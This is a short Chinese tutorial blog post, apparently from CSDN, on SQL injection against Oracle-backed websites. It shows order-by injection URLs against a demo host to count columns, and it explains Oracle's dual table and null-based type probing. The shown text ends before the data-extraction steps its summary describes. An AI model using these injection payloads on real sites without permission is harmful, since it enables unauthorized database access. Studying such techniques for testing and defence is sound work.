基于Oracle网站的SQL注入

本文探讨了在基于Oracle网站的SQL注入攻击中,如何利用`order by`查询列数,借助虚表`dual`进行无表名查询,通过`null`关键字判断数据类型,以及如何获取数据库名、表名和特定列名。通过示例展示了如何提取数据并提醒注意区分表名大小写。
摘要由CSDN通过智能技术生成

基于Oracle网站的SQL注入

参考链接1
参考链接2

  • 使用 order by 语句查询列数
www.vuln-web.com/photo.php?id=1' order by 1--
Working
www.vuln-web.com/photo.php?id=1' order by 10-- 

www.vuln-web.com/photo.php?id=1' order by 7--
Working
www.vuln-web.com/photo.php?id=1' order by 9--
Working
  • 可以得知第9列是最后一列

  • oracle不允许没有 from 子句的 select 语句,有时候我们确实不知道当前的数据库表是哪个的话,ORACLE提供了一个虚表dual,换句话说:在不知道当前的数据库表的情况下使用select查询语句时,可以使用虚表dual。
    1

  • 在真实的注入环境中一般是无法知道后台的数据库表的数据类型的,这时候就可以使用null关键字挨个判断每个数据是字符还是数字类型。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值